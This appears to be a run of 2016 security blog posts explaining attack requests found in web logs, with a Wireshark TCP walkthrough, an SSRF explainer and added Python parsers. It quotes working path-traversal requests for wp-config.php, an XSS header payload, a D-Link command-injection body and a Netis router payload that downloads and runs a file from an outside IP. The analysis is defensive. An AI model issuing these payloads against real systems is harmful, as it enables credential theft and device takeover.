GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
GET /wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php


These exploits take advantage of insecure WordPress plugins. Each of them has a query string parameter that lets you download a file. In theory the plugin was only supposed to serve files from its own directory, like the music or audio files it manages. But the plugin wasn't validating the path passed in, so path traversal (../../) lets the request climb out of the plugin directory and read anywhere in the file system the web server can read. In this case the attacker is going after wp-config.php, which contains the WordPress security keys and the database user and password, so some valuable data! Count the ../ segments and you can see each request is tuned to the depth of the vulnerable script: three to get from a plugin directory up to the WordPress root, four from the gallery/ and css/ subdirectories one level deeper.

To prevent this, either patch your plugins when vulns like this come out, or disable/remove unused plugins.


Calculating Seq & Ack Numbers in Packets

I thought it'd be interesting to walk through a Wireshark PCAP packet capture and see if I can explain how certain fields like the lengths, Sequence and Ack #s, etc. were calculated. It involves a client (10.8.8.101) making a single HTTP GET request to a web server (108.60.15.36) over port 80 and getting an HTTP 200 success response back. Note this PCAP originated from the awesome Malware Traffic Analysis blog and is a real capture from the Locky malspam @malware_traffic analyzed.



The first 3 packets above are the initial TCP handshake. (Wireshark shows relative sequence and acknowledgement numbers by default, which is why the values below start at 0 and 1 rather than at the random 32-bit initial sequence numbers actually on the wire.)

1.) You see a SYN from the client (10.8.8.101, flag 0x0002) saying 'hey server, I want to talk to you'. The Seq # is 0 (relative) and the Ack # is not used yet. The total packet is 66 bytes. The Ethernet header of an untagged frame is always 14, so the remainder (66-14 = 52) is the IP total length of 52. Since the IP header is 20, that leaves (52-20 = 32) for the TCP segment. The TCP header alone is 32 here because a SYN carries options such as MSS and window scale, so there is no TCP payload in this packet (32-32 = 0), which makes sense since it's the initial SYN.

2.) The server responds with a SYN-ACK (108.60.15.36, flag 0x0012) saying 'hey client, I received your SYN'. The server's Seq # is 0 (relative), and the Ack # is 1 because the client's SYN consumed one sequence number: the server is saying the next byte it expects from the client is #1. The total packet is 60 bytes. There are 14 for Ethernet again, so 60-14 = 46 for IP. But notice the IP total length says 44. That means the remaining 46-44 = 2 bytes are just zero padding, because an Ethernet frame has a minimum size of 60 bytes (64 with the FCS, which the capture doesn't include). Since the IP header is 20, we know (44-20 = 24) is the size of the TCP segment, and since the TCP header (20 plus 4 bytes of options) takes up all of it (24-24 = 0), we again have no TCP payload.

3.) The client then responds with an ACK (flag 0x0010) saying 'hey server, I got your SYN-ACK, let's start talking'. The client's Seq # is now 1, because its own SYN in packet 1 consumed sequence number 0, and the Ack # is 1 because the server's SYN consumed one sequence number too. The total packet is 60 bytes (14 for Ethernet, 44 for IP, 2 of padding). Since the IP header is 20, we know (44-20 = 24) is the size of the TCP segment, and since the TCP header takes up all of it (24-24 = 0) we again have no TCP payload.





The next several packets are the actual application layer HTTP GET request.

4.) You see application layer traffic starting now that the TCP handshake is complete. This is an HTTP GET request, so the client is requesting a web page from the server. It is a PSH/ACK (flag 0x0018): every packet after the handshake carries ACK, and PSH tells the receiver to hand the data up to the application right away instead of buffering it. The Seq # and Ack # both still read 1 for this initial request since no data has actually been transferred yet. You'll notice the total packet is 408 bytes this time though. The Ethernet header is 14 and the IP total length is 408-14 = 394. Then in the IP packet the header is 20, meaning the rest of it (the TCP segment) is 394-20 = 374. And in the TCP segment the header is 20, meaning the TCP payload (which in this case is the HTTP GET) is 374-20 = 354 bytes. If you were to look at the packet bytes in Wireshark for this packet you'd see actual HTTP request headers like Host, User-Agent, etc.

5.) This next packet is the server simply acknowledging that it received the HTTP GET request. Notice it's an ACK (0x0010). Also notice the total length is small again, only 60 bytes. Take out the 14 byte Ethernet header and you get 60-14 = 46 bytes for the rest. But notice again it says the IP total length is only 40, so 46-40 = 6 bytes of zero padding have been added to the end to fill out the Ethernet frame. Take out the 20 byte IP header and you get 40-20 = 20 bytes for TCP. Take out the 20 byte TCP header and you get 20-20 = 0 bytes of actual TCP payload. There is none since this is just the acknowledgement. Notice the Seq # stayed at 1, but the Ack # actually increased. If you recall from the previous packet, the TCP payload was 354 bytes. Thus the Ack # became 1+354 = 355, because it's the server saying 'hi client, I've received everything up to byte 354 and the next byte I expect from you is 355'. (The acknowledgement number is always the next expected byte, which is why the numbers in this walk-through come out 1 higher than the byte counts.)

6.) Next you'll see the web server continue with its 2nd packet in a row, actually responding to the client's GET request with some data, so it's going to get interesting now. See how the total length is 1514 bytes. Take out the 14 byte Ethernet header and you get 1514-14 = 1500 bytes of IP, which is the standard Ethernet MTU. Take out the 20 byte IP header and you get 1500-20 = 1480 bytes of TCP. Take out the 20 byte TCP header and you get 1480-20 = 1460 bytes of TCP payload (in this case the HTTP response headers followed by the start of the HTML the web server is returning for the requested page). Notice that the Ack # stayed at 355 because the server has not received any more data from the client, and the Seq # is still 1 because the server hasn't sent any payload bytes before this packet; the first byte of this packet is byte 1 of the server's stream.

7.) Next is an interesting but normal occurrence in TCP. The server (108.60.15.36) received the HTTP GET earlier and is now ready to fire packets back to the client in chunks in order to deliver the entire large HTTP response. The server isn't going to wait for the client to acknowledge every packet; as long as it has window to do so, it keeps sending. Thus in this case we see the server send 2 packets of HTTP data before the client acknowledges them (in packet #8). This packet is similar to packet #6: a PSH/ACK (0x0018), ACK because every packet after the handshake acknowledges the peer, PSH to tell the client to deliver the data to the application straight away. The total length of the packet is 1308. Remove 14 for the Ethernet header and 1308-14 = 1294 for IP. The IP header is 20, so 1294-20 = 1274 bytes for TCP. Take away the 20 byte TCP header and 1274-20 = 1254 bytes of TCP payload (more HTML from the HTTP response). So the Ack # stays at 355 because nothing new has arrived from the client, but the Seq # has increased to 1+1460 = 1461, the server saying 'hey client, I've already sent you 1460 bytes, this packet starts at byte 1461'.

8.) So this is the client finally sending an ACK (0x0010) back to the server saying 'hello server, I acknowledge I received your first 2 packets of data'. You'll notice the total length is small at 60 bytes again because this is just an ACK. The Ethernet header is 14 so 60-14 = 46 again, but since the IP total length is only 40 we get 46-40 = 6 bytes of zero padding for the Ethernet minimum frame size. Then again the IP header is 20 so 40-20 = 20 bytes remaining for TCP, and the TCP header is 20 so 20-20 = 0 bytes of actual TCP payload, which makes sense again since this is just the tiny acknowledgement packet. The Seq # is 355 because the client is saying 'hi server, just so you know, I've sent you 354 bytes of TCP payload so far and my next byte will be 355'. The Ack # is now pretty large at 1+1460+1254 = 2715, saying 'hi server, I've received 2714 bytes of TCP payload from you so far and the next byte I expect is 2715'. Note that one ACK covers both packets #6 and #7; TCP acknowledgements are cumulative.

9-360.) Packets 9 thru 360 are a repeat of 6 thru 8 over and over again. The server sends 1 or 2 packets of data, the client acknowledges the data it received. Each time, the client's Ack # keeps increasing by the number of TCP payload bytes it received, telling the server 'hey, I have so far received X bytes from you successfully', and the server's Seq # keeps increasing by the number of TCP payload bytes it sent, telling the client 'hey, I have so far sent Y bytes to you'.





361.) Now in Wireshark packet #361 looks different because it says HTTP/1.1 200 OK. But you'll notice from the Wireshark snippet above that Wireshark is just being smart and "re-assembling" all the TCP payloads of the HTTP response together to give you an easy to read view of it, which in this case was a 200 success meaning everybody was happy. This particular packet is otherwise essentially the same as packet #7, for example: it's just more TCP payload (HTTP response) with a PSH/ACK flag. The only difference is that this is the "last one" in the sequence. Note that it's 1001 total bytes. If we take out the 14 byte Ethernet header there are 1001-14 = 987 bytes for IP. Take out the 20 byte IP header and we have 987-20 = 967 bytes for TCP. Take out the 20 byte TCP header and we have 967-20 = 947 bytes of TCP payload (the final portion of the HTTP response). You'll notice the Ack # is still 355 because the server is saying 'hey client, just so you know, I've still only received 354 bytes from you', but the Seq # is now huge at 280900 because the server is saying 'hey client, I have sent you 280899 bytes so far and this packet starts at byte 280900'.

362.) This next packet is nearly identical to what we described in packet #8. It's the client's acknowledgement of the server sending data again. Notice the Seq # is still 355, saying 'hey server, I have sent you 354 bytes so far', and the Ack # is 280900, saying 'hey server, I have received everything up to byte 280899 from you successfully'. This is actually the acknowledgement of packet #360 (not #361).

363.) This packet is the acknowledgement of the final server packet #361. You can tell because the Ack # has jumped to 280900+947 = 281847, the client saying 'hey server, I have now received everything up to byte 281846 of TCP payload from you and the next byte I expect is 281847'.

364.) Finally we get to a graceful teardown. The server sends a FIN/PSH/ACK (0x0019), basically telling the client 'I have nothing more to send to you' (FIN); the PSH bit is along for the ride here, as it was on the data packets, and does not mean the server is asking the client for data. Notice the server has a Seq # of 281847 because it's saying 'hey client, my stream stands at byte 281847 after the 281846 bytes of TCP payload I've sent you', and the Ack # is still 355 because it's saying 'hey client, I have still only received 354 bytes of TCP payload from you'. The packet is a small one again because it's just a teardown: 60 bytes total, take away 14 for the Ethernet header and 60-14 = 46, but the IP total length only says 40, so 46-40 = 6 bytes of zero padding again. Then 20 bytes for the IP header leaves 40-20 = 20 bytes for TCP, and 20 bytes of TCP header means there are 20-20 = 0 bytes of TCP payload in it. The FIN itself consumes one sequence number, just like the SYN did.

365.) The client now acknowledges (ACK 0x0010) that the FIN teardown request was received. Since the prior packet contained a FIN, which consumes one sequence number, the Ack # increases by 1 to 281847+1 = 281848.

398.) Now notice the gap in Wireshark frame numbers (365 to 398). There is a longer time delay between the last packet and this one, and the frames in between belong to other conversations captured during that pause. This is basically the client finishing up whatever it was doing and saying 'ok, I have nothing more to send you either' (FIN).

399.) Finally the server acknowledges the client's request to tear down (FIN). Since the prior packet contained a FIN, the Ack # increases to 355+1 = 356. The conversation is done.
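
To make the bookkeeping above repeatable, here is an added example (mine, not part of the original post) that codes the two rules the walk-through applies: peeling Ethernet, IP and TCP headers off a frame length to get the payload size, and advancing each side's Seq/Ack as SYN, FIN and payload bytes consume sequence numbers. The packet list is constructed from the sizes quoted above; packets 9 through 360 are collapsed into one event carrying exactly the bytes needed to bring the server's Seq to 280900 at packet 361, and packet 362 is left out:

```python
ETH_HEADER = 14      # untagged Ethernet frame header
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def tcp_flags_value(flags):
    """'FIN,PSH,ACK' -> 0x019, the Flags value Wireshark displays."""
    return sum(FLAG_BITS[f] for f in flags.split(","))


def tcp_payload_len(frame_len, ip_total_len, ip_hdr_len=20, tcp_hdr_len=20):
    """Return (ethernet_padding, tcp_payload_bytes) for one captured frame.

    Frames shorter than the 60-byte Ethernet minimum are zero padded after the IP
    datagram, which is why frame_len - 14 can exceed the IP total length. Header
    lengths come from the IP IHL and TCP data offset fields (20 unless options)."""
    padding = frame_len - ETH_HEADER - ip_total_len
    if padding < 0:
        raise ValueError("IP total length larger than the frame")
    payload = ip_total_len - ip_hdr_len - tcp_hdr_len
    return padding, payload


def walk_stream(packets):
    """Compute Wireshark-style relative Seq/Ack numbers for one TCP conversation.

    packets: list of (sender, flags, payload_len). A side's Seq is the count of
    sequence numbers it has consumed so far: SYN and FIN consume one each, every
    payload byte consumes one. Its Ack is the peer's next expected sequence number.
    Returns (sender, flags, seq, ack, payload_len) per packet."""
    next_seq = {"client": 0, "server": 0}
    rows = []
    for sender, flags, payload in packets:
        peer = "server" if sender == "client" else "client"
        seq = next_seq[sender]
        ack = next_seq[peer] if "ACK" in flags else 0
        rows.append((sender, flags, seq, ack, payload))
        next_seq[sender] += payload + ("SYN" in flags) + ("FIN" in flags)
    return rows


# Constructed from the packet list in the post (see the lead-in for what is collapsed).
CAPTURE = [
    ("client", "SYN", 0),                               # 1
    ("server", "SYN,ACK", 0),                           # 2
    ("client", "ACK", 0),                               # 3
    ("client", "PSH,ACK", 354),                         # 4   HTTP GET
    ("server", "ACK", 0),                               # 5
    ("server", "PSH,ACK", 1460),                        # 6   response starts
    ("server", "PSH,ACK", 1254),                        # 7
    ("client", "ACK", 0),                               # 8
    ("server", "PSH,ACK", 280900 - 1 - 1460 - 1254),    # 9-360 collapsed
    ("server", "PSH,ACK", 947),                         # 361 end of response
    ("client", "ACK", 0),                               # 363
    ("server", "FIN,PSH,ACK", 0),                       # 364
    ("client", "ACK", 0),                               # 365
    ("client", "FIN,ACK", 0),                           # 398
    ("server", "ACK", 0),                               # 399
]

if __name__ == "__main__":
    for sender, flags, seq, ack, payload in walk_stream(CAPTURE):
        print("%-6s %-12s flags=0x%03x seq=%-6d ack=%-6d len=%d"
              % (sender, flags, tcp_flags_value(flags), seq, ack, payload))
```

Running it reproduces every Seq and Ack value quoted above (355, 1461, 2715, 280900, 281847, 281848, 356). The same walk is a quick way to spot gaps or retransmissions in a stream: if a packet's Seq is not the sender's running total, something was lost or resent in between.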


Thursday, August 11, 2016

Don't Ignore Adware and Click Fraud Alerts

Good article on why we should take adware and click fraud seriously and re-image workstations.

"People think of adware and click-fraud as a stupid type of threat," Barak said. "But what security experts need to consider is, most of the malware today can provide complete remote access."


Risks of Linux Support in Windows 10

Threatpost had a thought provoking article on WINDOWS 10 ATTACK SURFACE GROWS WITH LINUX SUPPORT IN ANNIVERSARY UPDATE. Since Windows 10 now ships with Linux support, it could lead to some interesting vulnerabilities showing up. If you're a Windows administrator, you may have to start paying attention to Linux patches and vulnerabilities as well, because if this feature is enabled, Linux-side issues can start affecting you. It's also an interesting thought that some endpoint protection agents may be deliberately looking only for Windows IoCs on Windows machines and Linux IoCs on Linux machines, but now those agents will have to account for both Linux and Windows binaries running in the Windows environment. Definitely something to keep an eye on and not forget about.


vBulletin SSRF Server-Side Request Forgery

An interesting article on a vBulletin SSRF vulnerability. Acunetix describes SSRF (Server-Side Request Forgery) nicely.

Think of it this way, with an SSRF request, you can make requests "on-behalf" of the vulnerable server!

Thus the primary target of an SSRF request is an internal system that you normally wouldn't have access to. Since you can make requests "on behalf" of the vulnerable server, and that server has access to the internal system, you can now reach it. As an example you could:
1.) Make SSRF attack request to internet facing Web Server X
2.) If vulnerable, Web Server X would turn around and run your scan/exploit attack against internal non-internet facing Application Server Y


Now the attack you run through it could vary, for example:
- Recon (where you try to enumerate all the internal, otherwise unreachable devices)
- Scans (where you try to identify vulnerabilities that exist on an internal, otherwise unreachable device)
- Exploit (where you try to exploit a vulnerability and compromise an internal, otherwise unreachable device)


All of those requests would come on behalf of the vulnerable server so it would appear as if the vulnerable web server is making the requests when in actuality the external attacker is making the requests.

For this particular vBulletin vulnerability, it can be mitigated by applying the appropriate patches.

At a higher level, to minimize the damage of an SSRF vulnerability in your environment, make sure you're applying network segmentation, firewall rules, IP filtering, least privilege, etc. so that even if the attacker finds an SSRF vulnerability and starts making requests on behalf of your vulnerable server, the attacker can only access, scan, and exploit the devices that the vulnerable server has access to, which hopefully is a small subset of your actual internal environment.
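
The network-level controls above limit the blast radius; an application that fetches URLs on behalf of users also needs its own check, and that is where most SSRF bugs live. Here is an added example (mine, unrelated to vBulletin's code) that goes a step beyond the post: it validates an outbound URL the way an SSRF-aware fetcher should, resolving the hostname first and refusing anything that maps to a private, loopback, link-local or otherwise internal address. The hostnames and DNS answers in FAKE_DNS are constructed so the check runs offline; resolve_all is the live resolver you would use in production:

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host):
    """Live resolver: every address the name currently maps to (v4 and v6)."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url, resolver=resolve_all):
    """Return (ok, reason, addresses) for a URL the server is asked to fetch.

    The caller must then connect to one of the returned addresses rather than
    re-resolving the hostname: a DNS answer can change between this check and the
    connect (rebinding), which is also why one internal answer refuses the lot."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", set()
    if parts.username or parts.password or not parts.hostname:
        return False, "bad authority", set()
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "bad port", set()
    if port not in ALLOWED_PORTS:
        return False, "port not allowed", set()
    host = parts.hostname
    try:
        addresses = {str(ipaddress.ip_address(host))}     # literal IP: no lookup
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError:                                   # socket.gaierror is an OSError
            return False, "resolution failed", set()
    if not addresses:
        return False, "no addresses", set()
    internal = {a for a in addresses if is_internal(a)}
    if internal:
        return False, "resolves to internal address", internal
    return True, "ok", addresses


# Constructed DNS answers so the check can be exercised without network access.
FAKE_DNS = {
    "public.example":   {"8.8.8.8"},
    "intranet.example": {"10.0.0.5"},
    "rebind.example":   {"8.8.8.8", "127.0.0.1"},    # mixed answer: must be refused
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise socket.gaierror("constructed NXDOMAIN for %s" % host)
    return FAKE_DNS[host]


if __name__ == "__main__":
    for candidate in ("https://public.example/callback", "http://intranet.example/",
                      "http://169.254.169.254/latest/meta-data/", "http://[::1]/",
                      "http://rebind.example/", "http://public.example:8080/"):
        print("%-45s %s" % (candidate, check_outbound_url(candidate, fake_resolver)[:2]))
```

The same function also rejects redirects if you call it again on each Location header before following it; a fetcher that checks only the first URL and then lets the HTTP library follow 302s is bypassed by pointing the public host at an internal one.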


Tuesday, August 9, 2016

Web Log Mini-Posts from August 9, 2016

Couple of mini-posts on random web logs

1-SAP recon
2-Old Apache XSS
3-Old Print Server vuln
4-Old DLink Router injection
5-Old Linksys Router injection



HEAD /irj/portal request

HEAD /irj/portal HTTP/1.0

Saw this in the logs, wondered what it was? It appears to be a common probe an attacker sends to discover websites running the SAP Java engine, which serves its portal under /irj/portal. SAP is ERP (enterprise resource planning) software. Perhaps they know of a vulnerability or attack on SAP and are trying to discover those sites; a HEAD request is a cheap way to fingerprint without pulling the page body.


Expect: alert(document.domain)

GET / HTTP/1.1
Expect: <script>alert(document.domain)</script>


Saw this request in some web logs, what is it? It appears to be a super old XSS (cross site scripting) vulnerability in Apache based web servers from back in 2006: the server echoed an unrecognized Expect header value back, unencoded, in its 417 Expectation Failed error page. The attacker is thus looking to see if he can find super old servers that were never patched. The JavaScript alert method creates a popup box in the browser, and document.domain prints out the current domain (the host part of the URL) the page is on, which is the usual way to prove that the script ran in the site's origin.


stssys.htm wget request

GET /stssys.htm HTTP/1.0
User-Agent: Wget(linux)


Saw this request in the HTTP logs, what could it be? It appears to be a 2013 TRENDnet print server vulnerability that allowed an attacker to reset the device to factory defaults, which would then allow them to set a new IP address. This could be done remotely without authentication by accessing particular web pages. This attacker is just using the Linux wget command to scan the internet and look for vulnerable print servers.


command.php wget HTTP Post

POST /command.php HTTP/1.0
User-Agent: Wget(linux)

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74


I saw this HTTP request in the logs and wondered what it was. It turns out that sometime in 2013 a D-Link® wireless router contained an OS command injection vulnerability on a web administrative page. So this attacker is looking for that vulnerable page and running a command.

I decoded the cmd parameter (it is just percent-encoded) to find that it runs this command.

cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

The attacker is simply going into the temp folder, creating a text file containing a marker string and printing the file back out. The marker is 610cker: the shell reduces \\x36 to \x36 and, on a shell whose echo -e understands hex escapes, that becomes the ASCII character 0x36, the digit 6, so the file holds exactly the text the scanner can look for in the HTTP response. If that text comes back, the attacker knows the command ran and the router is vulnerable, and he'll come back to do more damage.


hndUnblock.cgi wget calls

GET /hndUnblock.cgi HTTP/1.0
User-Agent: Wget(linux)


Saw this HTTP request in the logs, what could it mean? It appears that in April 2014 there was a Linksys router vulnerability. The web admin interface on those routers provides the hndUnblock.cgi page, and that page could be reached by an attacker and apparently contains an OS command injection vulnerability that allows execution of commands on the router. So this attacker is simply running an automated Linux script that calls wget and checks whether the vulnerable hndUnblock.cgi page exists.


Friday, August 5, 2016

Netis Router Backdoor UDP 53413

I saw this SANS Internet Storm Center post about Netis Router Backdoor exploit attempts. Thought it'd be interesting to take a quick look at one of them. It's a raw UDP packet sent to port 53413 with a shell command to be executed. Looks very similar to all those Shellshock attempts you continue to see in your logs.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

So first ...

cd /tmp || cd /var/ || cd /dev/;

The first thing the attacker tries is to move into a directory where he is likely to have write permission. He uses the double pipe (||) so that if the first command fails, the second is executed, and if that one fails, the third is executed: essentially 'if this command works do it, otherwise try the next, otherwise try the next'. So he sees whether he can change into /tmp, /var or /dev, which are typically writable on embedded devices. Once in any of those folders he's ready to execute the more interesting commands. Note that everything after the ; runs regardless of whether any of the cd commands succeeded.

Then

busybox tftp -r min -g 91.134.141.49;

Next the attacker is taking advantage of BusyBox, the tool that provides most of the basic Linux commands on embedded devices like the vulnerable Netis router, including tftp.

tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:

   -r FILE Remote FILE
   -g Get file


So the attacker is using the tftp command to get a remote file called 'min', in this case from the server at 91.134.141.49, and save it to the current directory (again this could be /tmp, /var, or /dev depending on which cd succeeded).

Then

cp /bin/sh .;

Next the attacker copies the shell executable into the current directory (again this could be /tmp, /var, or /dev depending on which cd succeeded).

Then

cat min >sh;

Next the attacker overwrites that copy with the downloaded file. Note that > truncates and replaces the contents (>> would append), so after this step the file named sh is no longer a shell at all: it is the downloaded payload 'min' under a name that looks harmless, which is likely the point of the cp in the previous step.

Then

chmod 777 sh;

Then the permissions are changed to 777 (read, write and execute for everyone) so the file can be executed.

Then

./sh.

Finally the attacker runs ./sh, which at this point is his downloaded payload, and your device is likely now compromised.

To prevent this, I'm not sure that I've seen anything about Netis actually patching it, so you probably need some sort of IPS (Intrusion Prevention System) with a signature that can block this type of traffic, or a firewall rule that drops inbound UDP 53413 from the internet.
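
Both this payload and the D-Link command.php one above are one-line shell chains, and the same small parser handles both. Here is an added example (mine, not from either post) that percent-decodes the D-Link cmd parameter, splits a chain on ; && || and |, works out what the echo -ne marker prints, and pulls out the indicators a SOC would want from the Netis chain (download server, fetched file, written and executed files). The two payload strings are copied from the posts; the Netis one keeps the trailing period exactly as quoted:

```python
import re
from urllib.parse import unquote

# Copies of the two payloads quoted in the posts.
DLINK_CMD_PARAM = "cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74"
NETIS_PAYLOAD = ("cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;"
                 "cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.")   # trailing '.' as quoted

SEPARATOR = re.compile(r"\s*(\|\||&&|;|\|)\s*")      # '||' must be tried before '|'
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
REDIRECT = re.compile(r">\s*(\S+)")


def decode_cmd_param(body):
    """Split name=value and percent-decode the value; shell escapes are left alone."""
    name, _, value = body.partition("=")
    return name, unquote(value)


def split_chain(cmdline):
    """Break a shell one-liner into [(operator_before, command), ...]."""
    pieces = SEPARATOR.split(cmdline.strip())
    steps, op = [], ""
    for i, piece in enumerate(pieces):
        if i % 2:                     # odd positions hold the captured separators
            op = piece
        elif piece:
            steps.append((op, piece))
    return steps


def shell_echo_ne(word):
    """What `echo -ne WORD` prints for an unquoted WORD: the shell first reduces a
    doubled backslash to one, then echo -e expands hex escapes such as \\x36
    (bash and recent BusyBox do)."""
    after_shell = word.replace("\\\\", "\\")
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})",
                  lambda m: chr(int(m.group(1), 16)), after_shell)


def extract_iocs(steps):
    """Remote IPs, tftp-fetched names, redirect targets and executed relative paths."""
    iocs = {"ips": set(), "fetched": set(), "written": set(), "executed": set()}
    for _op, cmd in steps:
        argv = cmd.split()
        iocs["ips"].update(IPV4.findall(cmd))
        if "tftp" in argv and "-r" in argv:
            iocs["fetched"].add(argv[argv.index("-r") + 1])
        if argv[0].startswith("./"):
            iocs["executed"].add(argv[0])
        m = REDIRECT.search(cmd)
        if m:
            iocs["written"].add(m.group(1))
    return iocs


if __name__ == "__main__":
    name, cmd = decode_cmd_param(DLINK_CMD_PARAM)
    print(name, "=", cmd)
    for op, step in split_chain(cmd):
        print("  %-2s %s" % (op, step))
    print("marker written:", shell_echo_ne(split_chain(cmd)[1][1].split()[2]))
    print(extract_iocs(split_chain(NETIS_PAYLOAD)))
```

Splitting on the operators before extracting indicators matters: a regex over the raw line would also match 'min' inside other words, and the operator in front of each step tells you whether it runs unconditionally (;) or only after the previous one succeeded (&&) or failed (||).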
